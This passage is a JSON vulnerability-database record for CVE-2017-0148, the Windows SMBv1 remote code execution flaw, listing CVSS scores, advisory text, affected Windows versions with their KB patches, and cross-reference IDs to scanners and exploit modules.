"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", 
"KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
